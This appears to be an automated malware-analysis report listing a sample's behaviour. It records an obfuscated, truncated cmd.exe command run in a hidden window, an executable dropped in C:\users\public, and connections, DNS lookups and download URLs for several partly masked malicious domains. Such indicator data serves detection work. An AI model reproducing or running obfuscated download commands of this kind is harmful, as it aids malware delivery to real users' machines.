Technical Information
- '<SYSTEM32>\cmd.exe' qTcGcWKFYmXTo FflnzhNFoTUMAMASPijWbXwLFRn nIDWcvwDJEXb & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qNOoUjcCjRztQbh%=IianIkFz&&set %RjkPobalmpO%=p&&set %IwjIzQ...
- C:\users\public\253786.exe
- C:\users\public\253786.exe
- 'bu##k.me.uk':80
- 'di###sgang.com':80
- 'br##m.de':80
- 'ea##data.gr':80
- 'ea##data.gr':443
- 'ba##no.com':80
- 'hu###omains.com':443
- http://bu##k.me.uk/rsVS/
- http://di###sgang.com/yZCLTO/
- http://br##m.de/3x2c/
- http://ea##data.gr/szTMNv/
- http://ba##no.com/3J6mS/
- 'ea##data.gr':443
- 'hu###omains.com':443
- DNS ASK bu##k.me.uk
- DNS ASK di###sgang.com
- DNS ASK br##m.de
- DNS ASK ea##data.gr
- DNS ASK ba##no.com
- DNS ASK hu###omains.com
- '<SYSTEM32>\cmd.exe' qTcGcWKFYmXTo FflnzhNFoTUMAMASPijWbXwLFRn nIDWcvwDJEXb & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qNOoUjcCjRztQbh%=IianIkFz&&set %RjkPobalmpO%=p&&set %IwjIzQ...' (with hidden window)